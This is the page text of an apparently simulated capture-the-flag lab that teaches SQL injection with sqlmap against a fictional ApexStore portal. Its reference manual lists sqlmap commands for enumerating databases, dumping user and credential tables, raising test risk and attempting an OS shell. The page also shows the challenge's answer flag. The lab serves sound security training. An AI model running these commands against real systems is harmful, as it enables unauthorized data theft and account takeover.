💉 ASSIGNMENT GOALS

Navigate to the target and identify the injectable parameter.

Use sqlmap --dbs to enumerate all databases.

Enumerate tables in apexstore and apex_hr.

Dump the users table from apexstore.

Dump the credentials table from apex_hr and find the flag.

Log into the admin panel using the discovered credentials.

Complete the pentest report and submit.

PHASE 1 — TARGET RECONNAISSANCE

💻

Terminal

🌐

Web Browser

📖

Reference Manual

📝

Notepad

📋

Pentest Report

⚠ CLASSIFIED — PENTEST ENGAGEMENT

MISSION BRIEFING

Operation: Injection Point | Tool: SQLmap

SCENARIO

Intelligence reports indicate that Apex Systems Inc. operates an internal e-commerce portal — ApexStore — that handles employee procurement and HR data.

Your objective is to use SQLmap to identify and exploit SQL injection vulnerabilities in the portal's search parameter, enumerate the backend databases, exfiltrate sensitive data, and gain unauthorized admin access via the discovered credentials.

OBJECTIVES

Open the browser, navigate to apexstore.lab, identify the vulnerable URL parameter.

Run sqlmap against the URL to discover all databases on the server.

Enumerate tables in the apexstore and apex_hr databases.

Dump the users table from apexstore — capture email and hash data.

Dump the credentials table from apex_hr — extract the admin flag.

Use the credentials to log into the admin panel in the browser.

Fill out the Pentest Report and submit.

TOOLS

💻

Terminal

sqlmap, curl, clear, help, ls

🌐

Browser

Navigate to apexstore.lab — observe the URL parameter

📖

Reference Manual

sqlmap flags, injection types, bypass techniques

📋

Pentest Report

Document and submit your findings

TARGET

🏢

ApexStore Portal

http://apexstore.lab | IP: 172.16.10.20

Display Mode

TERMINAL — root@kali

___ __H__ ___ ___[.]_____ ___ ___ {1.8.3#stable} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org

SQLmap Lab Terminal — Kali Linux 2024.1

Type 'help' for available commands.

root@kali:~#

WEB BROWSER

＋

←

→

↻

★

🏪 ApexStore

🔍 Search (vuln)

🔐 Login

⚙️ Admin Panel

LAB BROWSER

Navigate to the target or use the bookmarks above.

🏪

apexstore.lab

🔐

Login

APEX SYSTEMS PROCUREMENT PORTAL

Internal employee purchasing system — Authorized personnel only

Dell Latitude 5540 — $1,299

Business-class laptop. SKU: DL-5540-i7

HP EliteBook 840 — $1,149

Enterprise laptop with 13.3" display. SKU: HP-EB840-G9

Lenovo ThinkPad X1 Carbon — $1,549

Ultra-lightweight business laptop. SKU: LN-X1C-G11

STAFF LOGIN

USERNAME / EMAIL

PASSWORD

Forgot password? Contact IT support.

⛔ ACCESS DENIED

You are not authorized to access this area.
Use the credentials discovered through SQLmap
to log in first.

SYSTEM DASHBOARD

1,247

Total Orders

312

Active Users

$892K

Total Revenue

⚑ CAPTURE THE FLAG — ADMIN ACCESS CONFIRMED

FLAG{sqlm4p_1nj3ct10n_d4t4_3xf1l_0wn3d}

⚠ Security Notice: SQL injection vulnerability detected on the search endpoint. Immediate remediation required — implement parameterized queries and input validation.

REFERENCE MANUAL — SQLMAP

SQLMAP SYNTAX

sqlmap -u "URL" [options]
sqlmap -u "URL" --data="POST=data" [options]

PHASE 1 — ENUMERATE DATABASES

sqlmap -u "http://target/search?q=test" --dbs
sqlmap -u "http://target/search?q=test" --dbs --batch

PHASE 2 — ENUMERATE TABLES

sqlmap -u "URL" -D <database> --tables

# Example:
sqlmap -u "http://apexstore.lab/search?q=test" -D apexstore --tables
sqlmap -u "http://apexstore.lab/search?q=test" -D apex_hr --tables

PHASE 3 — DUMP DATA

sqlmap -u "URL" -D <db> -T <table> --dump

# Example:
sqlmap -u "URL" -D apexstore -T users --dump
sqlmap -u "URL" -D apex_hr -T credentials --dump

POST FORM INJECTION

sqlmap -u "URL" --data="username=test&password=test" --dbs
sqlmap -u "URL" --forms --dbs

KEY FLAGS

FLAG	DESCRIPTION
--dbs	Enumerate all databases
-D <db>	Select a specific database
--tables	List tables in selected DB
-T <table>	Select a specific table
--dump	Dump table contents
--columns	List columns in a table
--batch	Non-interactive mode (auto yes)
--level=5	Increase test depth (1-5)
--risk=3	Increase risk of tests (1-3)
--forms	Auto-detect and test forms
--data	POST data string
-p <param>	Test specific parameter only
--dbms=mysql	Force database type
--os-shell	Attempt OS shell (if privileged)

INJECTION TYPES

TYPE	DESCRIPTION
Boolean-based	Infer data from true/false responses
Error-based	Extract data from DB error messages
UNION-based	Append extra SELECT to get data
Time-based	Infer data from response delay
Stacked queries	Execute multiple statements

NOTEPAD — notes.txt

Ln 1, Col 1UTF-8notes.txt

PENTEST REPORT — SQL INJECTION FINDINGS

SQL INJECTION FINDINGS REPORT

APEX SYSTEMS INC. — RED TEAM ENGAGEMENT — COMPLETE ALL FIELDS

SECTION 1 — VULNERABILITY DETAILS

Vulnerable URL Parameter

Injection Type Confirmed

SECTION 2 — DATABASES & TABLES FOUND

Number of Databases Found

Target Database Containing Credentials

Tables Dumped (list all)

SECTION 3 — EXTRACTED CREDENTIALS

Admin Username

Admin Password

SECTION 4 — RISK ASSESSMENT

Overall Risk Rating

Remediation Priority

Recommendations